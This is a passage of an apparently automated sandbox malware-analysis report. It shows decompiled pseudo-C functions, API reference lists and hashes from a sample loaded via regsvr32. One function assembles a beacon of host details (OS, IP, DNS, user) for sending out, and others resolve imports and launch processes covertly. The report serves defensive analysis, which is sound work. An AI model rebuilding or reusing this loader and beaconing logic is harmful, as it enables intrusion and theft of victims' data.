                                                  • Opcode Fuzzy Hash: 9023bf63f34e771c626b5322fdceb4c6a7e53c88f755fe05e8a6cefbf2426461
                                                  • Instruction Fuzzy Hash: 6A61C5B0A14106AADB24FBF8DC88F5F77ED9B587187244A25F512D3255E730DE80972C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 66%
                                                  			E00C8A279(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                                  				intOrPtr _v0;
                                                  				intOrPtr _v4;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v28;
                                                  				void* _v44;
                                                  				intOrPtr _v52;
                                                  				void* __edi;
                                                  				long _t25;
                                                  				intOrPtr _t26;
                                                  				intOrPtr _t27;
                                                  				intOrPtr _t28;
                                                  				intOrPtr _t29;
                                                  				intOrPtr _t30;
                                                  				void* _t33;
                                                  				intOrPtr _t34;
                                                  				int _t37;
                                                  				intOrPtr _t42;
                                                  				intOrPtr _t43;
                                                  				intOrPtr _t50;
                                                  				intOrPtr _t54;
                                                  				intOrPtr* _t56;
                                                  				intOrPtr _t62;
                                                  				intOrPtr _t68;
                                                  				intOrPtr _t71;
                                                  				intOrPtr _t74;
                                                  				int _t77;
                                                  				intOrPtr _t78;
                                                  				int _t81;
                                                  				intOrPtr _t83;
                                                  				int _t86;
                                                  				intOrPtr* _t89;
                                                  				intOrPtr* _t90;
                                                  				void* _t91;
                                                  				void* _t95;
                                                  				void* _t96;
                                                  				void* _t97;
                                                  				intOrPtr _t98;
                                                  				void* _t100;
                                                  				int _t101;
                                                  				void* _t102;
                                                  				void* _t103;
                                                  				void* _t105;
                                                  				void* _t106;
                                                  				void* _t108;
                                                  
                                                  				_t95 = __edx;
                                                  				_t91 = __ecx;
                                                  				_t25 = __eax;
                                                  				_t105 = _a16;
                                                  				_v4 = 8;
                                                  				if(__eax == 0) {
                                                  					_t25 = GetTickCount();
                                                  				}
                                                  				_t26 =  *0xc8d018; // 0xf56cfa1f
                                                  				asm("bswap eax");
                                                  				_t27 =  *0xc8d014; // 0x3a87c8cd
                                                  				asm("bswap eax");
                                                  				_t28 =  *0xc8d010; // 0xd8d2f808
                                                  				asm("bswap eax");
                                                  				_t29 =  *0xc8d00c; // 0x8f8f86c2
                                                  				asm("bswap eax");
                                                  				_t30 =  *0xc8d27c; // 0x41a5a8
                                                  				_t3 = _t30 + 0xc8e633; // 0x74666f73
                                                  				_t101 = wsprintfA(_t105, _t3, 2, 0x3d14b, _t29, _t28, _t27, _t26,  *0xc8d02c,  *0xc8d004, _t25);
                                                  				_t33 = E00C81C1A();
                                                  				_t34 =  *0xc8d27c; // 0x41a5a8
                                                  				_t4 = _t34 + 0xc8e673; // 0x74707526
                                                  				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                  				_t108 = _t106 + 0x38;
                                                  				_t102 = _t101 + _t37;
                                                  				_t96 = E00C854BC(_t91);
                                                  				if(_t96 != 0) {
                                                  					_t83 =  *0xc8d27c; // 0x41a5a8
                                                  					_t6 = _t83 + 0xc8e8eb; // 0x736e6426
                                                  					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                  					_t108 = _t108 + 0xc;
                                                  					_t102 = _t102 + _t86;
                                                  					HeapFree( *0xc8d238, 0, _t96);
                                                  				}
                                                  				_t97 = E00C87649();
                                                  				if(_t97 != 0) {
                                                  					_t78 =  *0xc8d27c; // 0x41a5a8
                                                  					_t8 = _t78 + 0xc8e8f3; // 0x6f687726
                                                  					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                  					_t108 = _t108 + 0xc;
                                                  					_t102 = _t102 + _t81;
                                                  					HeapFree( *0xc8d238, 0, _t97);
                                                  				}
                                                  				_t98 =  *0xc8d32c; // 0x10a95b0
                                                  				_a32 = E00C89395(0xc8d00a, _t98 + 4);
                                                  				_t42 =  *0xc8d2cc; // 0x0
                                                  				if(_t42 != 0) {
                                                  					_t74 =  *0xc8d27c; // 0x41a5a8
                                                  					_t11 = _t74 + 0xc8e8cd; // 0x3d736f26
                                                  					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                  					_t108 = _t108 + 0xc;
                                                  					_t102 = _t102 + _t77;
                                                  				}
                                                  				_t43 =  *0xc8d2c8; // 0x0
                                                  				if(_t43 != 0) {
                                                  					_t71 =  *0xc8d27c; // 0x41a5a8
                                                  					_t13 = _t71 + 0xc8e8c6; // 0x3d706926
                                                  					wsprintfA(_t102 + _t105, _t13, _t43);
                                                  				}
                                                  				if(_a32 != 0) {
                                                  					_t100 = RtlAllocateHeap( *0xc8d238, 0, 0x800);
                                                  					if(_t100 != 0) {
                                                  						E00C87A80(GetTickCount());
                                                  						_t50 =  *0xc8d32c; // 0x10a95b0
                                                  						__imp__(_t50 + 0x40);
                                                  						asm("lock xadd [eax], ecx");
                                                  						_t54 =  *0xc8d32c; // 0x10a95b0
                                                  						__imp__(_t54 + 0x40);
                                                  						_t56 =  *0xc8d32c; // 0x10a95b0
                                                  						_t103 = E00C88307(1, _t95, _t105,  *_t56);
                                                  						asm("lock xadd [eax], ecx");
                                                  						if(_t103 != 0) {
                                                  							StrTrimA(_t103, 0xc8c2ac);
                                                  							_push(_t103);
                                                  							_t62 = E00C83CC8();
                                                  							_v16 = _t62;
                                                  							if(_t62 != 0) {
                                                  								_t89 = __imp__;
                                                  								 *_t89(_t103, _v0);
                                                  								 *_t89(_t100, _a4);
                                                  								_t90 = __imp__;
                                                  								 *_t90(_t100, _v28);
                                                  								 *_t90(_t100, _t103);
                                                  								_t68 = E00C81199(0xffffffffffffffff, _t100, _v28, _v24);
                                                  								_v52 = _t68;
                                                  								if(_t68 != 0 && _t68 != 0x10d2) {
                                                  									E00C8A1B0();
                                                  								}
                                                  								HeapFree( *0xc8d238, 0, _v44);
                                                  							}
                                                  							HeapFree( *0xc8d238, 0, _t103);
                                                  						}
                                                  						HeapFree( *0xc8d238, 0, _t100);
                                                  					}
                                                  					HeapFree( *0xc8d238, 0, _a24);
                                                  				}
                                                  				HeapFree( *0xc8d238, 0, _t105);
                                                  				return _a12;
                                                  			}
                                                  0x00c8a279
                                                  0x00c8a279
                                                  0x00c8a279
                                                  0x00c8a280
                                                  0x00c8a286
                                                  0x00c8a28e
                                                  0x00c8a290
                                                  0x00c8a290
                                                  0x00c8a29d
                                                  0x00c8a2a8
                                                  0x00c8a2ab
                                                  0x00c8a2b6
                                                  0x00c8a2b9
                                                  0x00c8a2be
                                                  0x00c8a2c1
                                                  0x00c8a2c6
                                                  0x00c8a2c9
                                                  0x00c8a2d5
                                                  0x00c8a2e2
                                                  0x00c8a2e4
                                                  0x00c8a2ea
                                                  0x00c8a2ef
                                                  0x00c8a2fa
                                                  0x00c8a2fc
                                                  0x00c8a2ff
                                                  0x00c8a306
                                                  0x00c8a30a
                                                  0x00c8a30c
                                                  0x00c8a311
                                                  0x00c8a31d
                                                  0x00c8a31f
                                                  0x00c8a32b
                                                  0x00c8a32d
                                                  0x00c8a32d
                                                  0x00c8a338
                                                  0x00c8a33c
                                                  0x00c8a33e
                                                  0x00c8a343
                                                  0x00c8a34f
                                                  0x00c8a351
                                                  0x00c8a35d
                                                  0x00c8a35f
                                                  0x00c8a35f
                                                  0x00c8a365
                                                  0x00c8a378
                                                  0x00c8a37c
                                                  0x00c8a383

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00C8A290
                                                  • wsprintfA.USER32 ref: 00C8A2DD
                                                  • wsprintfA.USER32 ref: 00C8A2FA
                                                  • wsprintfA.USER32 ref: 00C8A31D
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00C8A32D
                                                  • wsprintfA.USER32 ref: 00C8A34F
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00C8A35F
                                                  • wsprintfA.USER32 ref: 00C8A396
                                                  • wsprintfA.USER32 ref: 00C8A3B6
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00C8A3D3
                                                  • GetTickCount.KERNEL32 ref: 00C8A3E3
                                                  • RtlEnterCriticalSection.NTDLL(010A9570), ref: 00C8A3F7
                                                  • RtlLeaveCriticalSection.NTDLL(010A9570), ref: 00C8A415
                                                    • Part of subcall function 00C88307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,00C8A428,?,010A95B0), ref: 00C88332
                                                    • Part of subcall function 00C88307: lstrlen.KERNEL32(?,?,?,00C8A428,?,010A95B0), ref: 00C8833A
                                                    • Part of subcall function 00C88307: strcpy.NTDLL ref: 00C88351
                                                    • Part of subcall function 00C88307: lstrcat.KERNEL32(00000000,?), ref: 00C8835C
                                                    • Part of subcall function 00C88307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00C8A428,?,010A95B0), ref: 00C88379
                                                  • StrTrimA.SHLWAPI(00000000,00C8C2AC,?,010A95B0), ref: 00C8A447
                                                    • Part of subcall function 00C83CC8: lstrlen.KERNEL32(010A87FA,00000000,00000000,74ECC740,00C8A453,00000000), ref: 00C83CD8
                                                    • Part of subcall function 00C83CC8: lstrlen.KERNEL32(?), ref: 00C83CE0
                                                    • Part of subcall function 00C83CC8: lstrcpy.KERNEL32(00000000,010A87FA), ref: 00C83CF4
                                                    • Part of subcall function 00C83CC8: lstrcat.KERNEL32(00000000,?), ref: 00C83CFF
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 00C8A466
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8A46D
                                                  • lstrcat.KERNEL32(00000000,?), ref: 00C8A47A
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00C8A47E
                                                    • Part of subcall function 00C81199: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 00C8124B
                                                  • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00C8A4AE
                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00C8A4BD
                                                  • HeapFree.KERNEL32(00000000,00000000,?,010A95B0), ref: 00C8A4CC
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00C8A4DE
                                                  • HeapFree.KERNEL32(00000000,?), ref: 00C8A4ED
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                  • String ID:
                                                  • API String ID: 3080378247-0
                                                  • Opcode ID: fb0385cb994880977013de2833c25e321672ade0fcc04759ade0839cbfa7f5ff
                                                  • Instruction ID: dbdbfe1499be6b30f8619ade750c39044ec939d90f1f08d2132f6a9fe2718b3a
                                                  • Opcode Fuzzy Hash: fb0385cb994880977013de2833c25e321672ade0fcc04759ade0839cbfa7f5ff
                                                  • Instruction Fuzzy Hash: 2E61AC71500200EFD721AB68EC88F5E7BE8EB48754F054125F90AD72B1DB35ED06AB6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 51%
                                                  			E00C8ADE5(long _a4, long _a8) {
                                                  				signed int _v8;
                                                  				intOrPtr _v16;
                                                  				LONG* _v28;
                                                  				long _v40;
                                                  				long _v44;
                                                  				long _v48;
                                                  				CHAR* _v52;
                                                  				long _v56;
                                                  				CHAR* _v60;
                                                  				long _v64;
                                                  				signed int* _v68;
                                                  				char _v72;
                                                  				signed int _t76;
                                                  				signed int _t80;
                                                  				signed int _t81;
                                                  				intOrPtr* _t82;
                                                  				intOrPtr* _t83;
                                                  				intOrPtr* _t85;
                                                  				intOrPtr* _t90;
                                                  				intOrPtr* _t95;
                                                  				intOrPtr* _t98;
                                                  				void* _t102;
                                                  				intOrPtr* _t104;
                                                  				void* _t115;
                                                  				long _t116;
                                                  				void _t125;
                                                  				void* _t131;
                                                  				signed short _t133;
                                                  				struct HINSTANCE__* _t138;
                                                  				signed int* _t139;
                                                  
                                                  				_t139 = _a4;
                                                  				_v28 = _t139[2] + 0xc80000;
                                                  				_t115 = _t139[3] + 0xc80000;
                                                  				_t131 = _t139[4] + 0xc80000;
                                                  				_v8 = _t139[7];
                                                  				_v60 = _t139[1] + 0xc80000;
                                                  				_v16 = _t139[5] + 0xc80000;
                                                  				_v64 = _a8;
                                                  				_v72 = 0x24;
                                                  				_v68 = _t139;
                                                  				_v56 = 0;
                                                  				asm("stosd");
                                                  				_v48 = 0;
                                                  				_v44 = 0;
                                                  				_v40 = 0;
                                                  				if(( *_t139 & 0x00000001) == 0) {
                                                  					_a8 =  &_v72;
                                                  					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                                  					return 0;
                                                  				}
                                                  				_t138 =  *_v28;
                                                  				_t76 = _a8 - _t115 >> 2 << 2;
                                                  				_t133 =  *(_t131 + _t76);
                                                  				_a4 = _t76;
                                                  				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                                  				_v56 = _t80;
                                                  				_t81 = _t133 + 0xc80002;
                                                  				if(_t80 == 0) {
                                                  					_t81 = _t133 & 0x0000ffff;
                                                  				}
                                                  				_v52 = _t81;
                                                  				_t82 =  *0xc8d1a0; // 0x0
                                                  				_t116 = 0;
                                                  				if(_t82 == 0) {
                                                  					L6:
                                                  					if(_t138 != 0) {
                                                  						L18:
                                                  						_t83 =  *0xc8d1a0; // 0x0
                                                  						_v48 = _t138;
                                                  						if(_t83 != 0) {
                                                  							_t116 =  *_t83(2,  &_v72);
                                                  						}
                                                  						if(_t116 != 0) {
                                                  							L32:
                                                  							 *_a8 = _t116;
                                                  							L33:
                                                  							_t85 =  *0xc8d1a0; // 0x0
                                                  							if(_t85 != 0) {
                                                  								_v40 = _v40 & 0x00000000;
                                                  								_v48 = _t138;
                                                  								_v44 = _t116;
                                                  								 *_t85(5,  &_v72);
                                                  							}
                                                  							return _t116;
                                                  						} else {
                                                  							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                                  								L27:
                                                  								_t116 = GetProcAddress(_t138, _v52);
                                                  								if(_t116 == 0) {
                                                  									_v40 = GetLastError();
                                                  									_t90 =  *0xc8d19c; // 0x0
                                                  									if(_t90 != 0) {
                                                  										_t116 =  *_t90(4,  &_v72);
                                                  									}
                                                  									if(_t116 == 0) {
                                                  										_a4 =  &_v72;
                                                  										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                                  										_t116 = _v44;
                                                  									}
                                                  								}
                                                  								goto L32;
                                                  							} else {
                                                  								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                                  								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                                  									_t116 =  *(_a4 + _v16);
                                                  									if(_t116 != 0) {
                                                  										goto L32;
                                                  									}
                                                  								}
                                                  								goto L27;
                                                  							}
                                                  						}
                                                  					}
                                                  					_t98 =  *0xc8d1a0; // 0x0
                                                  					if(_t98 == 0) {
                                                  						L9:
                                                  						_t138 = LoadLibraryA(_v60);
                                                  						if(_t138 != 0) {
                                                  							L13:
                                                  							if(InterlockedExchange(_v28, _t138) == _t138) {
                                                  								FreeLibrary(_t138);
                                                  							} else {
                                                  								if(_t139[6] != 0) {
                                                  									_t102 = LocalAlloc(0x40, 8);
                                                  									if(_t102 != 0) {
                                                  										 *(_t102 + 4) = _t139;
                                                  										_t125 =  *0xc8d198; // 0x0
                                                  										 *_t102 = _t125;
                                                  										 *0xc8d198 = _t102;
                                                  									}
                                                  								}
                                                  							}
                                                  							goto L18;
                                                  						}
                                                  						_v40 = GetLastError();
                                                  						_t104 =  *0xc8d19c; // 0x0
                                                  						if(_t104 == 0) {
                                                  							L12:
                                                  							_a8 =  &_v72;
                                                  							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                                  							return _v44;
                                                  						}
                                                  						_t138 =  *_t104(3,  &_v72);
                                                  						if(_t138 != 0) {
                                                  							goto L13;
                                                  						}
                                                  						goto L12;
                                                  					}
                                                  					_t138 =  *_t98(1,  &_v72);
                                                  					if(_t138 != 0) {
                                                  						goto L13;
                                                  					}
                                                  					goto L9;
                                                  				}
                                                  				_t116 =  *_t82(0,  &_v72);
                                                  				if(_t116 != 0) {
                                                  					goto L33;
                                                  				}
                                                  				goto L6;
                                                  			}

                                                  APIs
                                                  • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C8AE5E
                                                  • LoadLibraryA.KERNEL32(?), ref: 00C8AEDB
                                                  • GetLastError.KERNEL32 ref: 00C8AEE7
                                                  • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00C8AF1A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                  • String ID: $
                                                  • API String ID: 948315288-3993045852
                                                  • Opcode ID: 37c80d5ca2966c83b3afe67abe57b4da5ba515a305edc11bae0e4891c399158c
                                                  • Instruction ID: 06ba2f4b3fa117865d764354d5c84f473496e0411a1721f0cc6b274b936e5535
                                                  • Opcode Fuzzy Hash: 37c80d5ca2966c83b3afe67abe57b4da5ba515a305edc11bae0e4891c399158c
                                                  • Instruction Fuzzy Hash: A0813EB1A00605AFEB10DF99D884BAEB7F5FF48314F14802AE615D7250EB70EE45CB69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 27%
                                                  			E00C8816C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v12;
                                                  				long _v16;
                                                  				intOrPtr _v20;
                                                  				signed int _v24;
                                                  				void* __esi;
                                                  				long _t43;
                                                  				intOrPtr _t44;
                                                  				intOrPtr _t46;
                                                  				void* _t48;
                                                  				void* _t49;
                                                  				void* _t50;
                                                  				intOrPtr _t54;
                                                  				intOrPtr _t57;
                                                  				void* _t58;
                                                  				void* _t59;
                                                  				void* _t60;
                                                  				intOrPtr _t66;
                                                  				void* _t71;
                                                  				void* _t74;
                                                  				intOrPtr _t75;
                                                  				void* _t77;
                                                  				intOrPtr _t79;
                                                  				intOrPtr* _t80;
                                                  				intOrPtr _t91;
                                                  
                                                  				_t79 =  *0xc8d33c; // 0x10a9bc8
                                                  				_v24 = 8;
                                                  				_t43 = GetTickCount();
                                                  				_push(5);
                                                  				_t74 = 0xa;
                                                  				_v16 = _t43;
                                                  				_t44 = E00C870F5(_t74,  &_v16);
                                                  				_v8 = _t44;
                                                  				if(_t44 == 0) {
                                                  					_v8 = 0xc8c1ac;
                                                  				}
                                                  				_t46 = E00C88022(_t79);
                                                  				_v12 = _t46;
                                                  				if(_t46 != 0) {
                                                  					_t80 = __imp__;
                                                  					_t48 =  *_t80(_v8, _t71);
                                                  					_t49 =  *_t80(_v12);
                                                  					_t50 =  *_t80(_a4);
                                                  					_t54 = E00C82049(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                  					_v20 = _t54;
                                                  					if(_t54 != 0) {
                                                  						_t75 =  *0xc8d27c; // 0x41a5a8
                                                  						_t16 = _t75 + 0xc8eb28; // 0x530025
                                                  						 *0xc8d11c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                  						_push(4);
                                                  						_t77 = 5;
                                                  						_t57 = E00C870F5(_t77,  &_v16);
                                                  						_v8 = _t57;
                                                  						if(_t57 == 0) {
                                                  							_v8 = 0xc8c1b0;
                                                  						}
                                                  						_t58 =  *_t80(_v8);
                                                  						_t59 =  *_t80(_v12);
                                                  						_t60 =  *_t80(_a4);
                                                  						_t91 = E00C82049(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                  						if(_t91 == 0) {
                                                  							E00C89039(_v20);
                                                  						} else {
                                                  							_t66 =  *0xc8d27c; // 0x41a5a8
                                                  							_t31 = _t66 + 0xc8ec48; // 0x73006d
                                                  							 *0xc8d11c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                  							 *_a16 = _v20;
                                                  							_v24 = _v24 & 0x00000000;
                                                  							 *_a20 = _t91;
                                                  						}
                                                  					}
                                                  					E00C89039(_v12);
                                                  				}
                                                  				return _v24;
                                                  			}

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00C88181
                                                  • lstrlen.KERNEL32(?,80000002,00000005), ref: 00C881C1
                                                  • lstrlen.KERNEL32(00000000), ref: 00C881CA
                                                  • lstrlen.KERNEL32(00000000), ref: 00C881D1
                                                  • lstrlenW.KERNEL32(80000002), ref: 00C881DE
                                                  • lstrlen.KERNEL32(?,00000004), ref: 00C8823E
                                                  • lstrlen.KERNEL32(?), ref: 00C88247
                                                  • lstrlen.KERNEL32(?), ref: 00C8824E
                                                  • lstrlenW.KERNEL32(?), ref: 00C88255
                                                    • Part of subcall function 00C89039: HeapFree.KERNEL32(00000000,00000000,00C87F18,00000000,?,?,00000000), ref: 00C89045
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CountFreeHeapTick
                                                  • String ID:
                                                  • API String ID: 2535036572-0
                                                  • Opcode ID: bf95da90320db3bc11760dd07feea4307e5676f446679e71fdcbdc0b3869cebc
                                                  • Instruction ID: 06288756c9413af609bddcbcfa2e2ba91c36b10ca4bde044e3f006251e650b4d
                                                  • Opcode Fuzzy Hash: bf95da90320db3bc11760dd07feea4307e5676f446679e71fdcbdc0b3869cebc
                                                  • Instruction Fuzzy Hash: 32416972800219EFCF11BFA4CC49A9EBBB5EF48358F154061FD04A7261DB359A15EFA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 73%
                                                  			E00C8205E(void* __eax, void* __ecx) {
                                                  				long _v8;
                                                  				char _v12;
                                                  				void* _v16;
                                                  				void* _v28;
                                                  				long _v32;
                                                  				void _v104;
                                                  				char _v108;
                                                  				long _t36;
                                                  				intOrPtr _t40;
                                                  				intOrPtr _t47;
                                                  				intOrPtr _t50;
                                                  				void* _t58;
                                                  				void* _t68;
                                                  				intOrPtr* _t70;
                                                  				intOrPtr* _t71;
                                                  
                                                  				_t1 = __eax + 0x14; // 0x74183966
                                                  				_t69 =  *_t1;
                                                  				_t36 = E00C8692C(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                  				_v8 = _t36;
                                                  				if(_t36 != 0) {
                                                  					L12:
                                                  					return _v8;
                                                  				}
                                                  				E00C8A8D8( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                  				_t40 = _v12(_v12);
                                                  				_v8 = _t40;
                                                  				if(_t40 == 0 && ( *0xc8d260 & 0x00000001) != 0) {
                                                  					_v32 = 0;
                                                  					asm("stosd");
                                                  					asm("stosd");
                                                  					asm("stosd");
                                                  					_v108 = 0;
                                                  					memset( &_v104, 0, 0x40);
                                                  					_t47 =  *0xc8d27c; // 0x41a5a8
                                                  					_t18 = _t47 + 0xc8e3e6; // 0x73797325
                                                  					_t68 = E00C895B1(_t18);
                                                  					if(_t68 == 0) {
                                                  						_v8 = 8;
                                                  					} else {
                                                  						_t50 =  *0xc8d27c; // 0x41a5a8
                                                  						_t19 = _t50 + 0xc8e747; // 0x10a8cef
                                                  						_t20 = _t50 + 0xc8e0af; // 0x4e52454b
                                                  						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                  						if(_t71 == 0) {
                                                  							_v8 = 0x7f;
                                                  						} else {
                                                  							_v108 = 0x44;
                                                  							E00C884D5();
                                                  							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                  							_push(1);
                                                  							E00C884D5();
                                                  							if(_t58 == 0) {
                                                  								_v8 = GetLastError();
                                                  							} else {
                                                  								CloseHandle(_v28);
                                                  								CloseHandle(_v32);
                                                  							}
                                                  						}
                                                  						HeapFree( *0xc8d238, 0, _t68);
                                                  					}
                                                  				}
                                                  				_t70 = _v16;
                                                  				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                  				E00C89039(_t70);
                                                  				goto L12;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 00C8692C: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00C8207A,?,00000001,?,?,00000000,00000000), ref: 00C86951
                                                    • Part of subcall function 00C8692C: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00C86973
                                                    • Part of subcall function 00C8692C: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00C86989
                                                    • Part of subcall function 00C8692C: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00C8699F
                                                    • Part of subcall function 00C8692C: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00C869B5
                                                    • Part of subcall function 00C8692C: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00C869CB
                                                  • memset.NTDLL ref: 00C820C8
                                                    • Part of subcall function 00C895B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00C823E9,63699BCE,00C81354,73797325), ref: 00C895C2
                                                    • Part of subcall function 00C895B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00C895DC
                                                  • GetModuleHandleA.KERNEL32(4E52454B,010A8CEF,73797325), ref: 00C820FE
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00C82105
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00C8216D
                                                    • Part of subcall function 00C884D5: GetProcAddress.KERNEL32(36776F57,00C821E5), ref: 00C884F0
                                                  • CloseHandle.KERNEL32(00000000,00000001), ref: 00C8214A
                                                  • CloseHandle.KERNEL32(?), ref: 00C8214F
                                                  • GetLastError.KERNEL32(00000001), ref: 00C82153
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                  • String ID:
                                                  • API String ID: 3075724336-0
                                                  • Opcode ID: 5ecfa1b3baf965cd6f2310b6631b321fe381dea58af56ef12b9c7e5271e765c3
                                                  • Instruction ID: 47c8b7a92416b3c11e8db0cccfbd2f5a77920f0058cb0a49ad0fc616c93f6c68
                                                  • Opcode Fuzzy Hash: 5ecfa1b3baf965cd6f2310b6631b321fe381dea58af56ef12b9c7e5271e765c3
                                                  • Instruction Fuzzy Hash: CD314FB2800209FFDB10AFA4DC89EAFBBBCEB08358F104465F615A7161D7349E45DB68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 63%
                                                  			E00C88307(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _t9;
                                                  				intOrPtr _t13;
                                                  				char* _t28;
                                                  				void* _t33;
                                                  				void* _t34;
                                                  				char* _t36;
                                                  				intOrPtr* _t40;
                                                  				char* _t41;
                                                  				char* _t42;
                                                  				char* _t43;
                                                  
                                                  				_t34 = __edx;
                                                  				_push(__ecx);
                                                  				_t9 =  *0xc8d27c; // 0x41a5a8
                                                  				_t1 = _t9 + 0xc8e62c; // 0x253d7325
                                                  				_t36 = 0;
                                                  				_t28 = E00C89401(__ecx, _t1);
                                                  				if(_t28 != 0) {
                                                  					_t40 = __imp__;
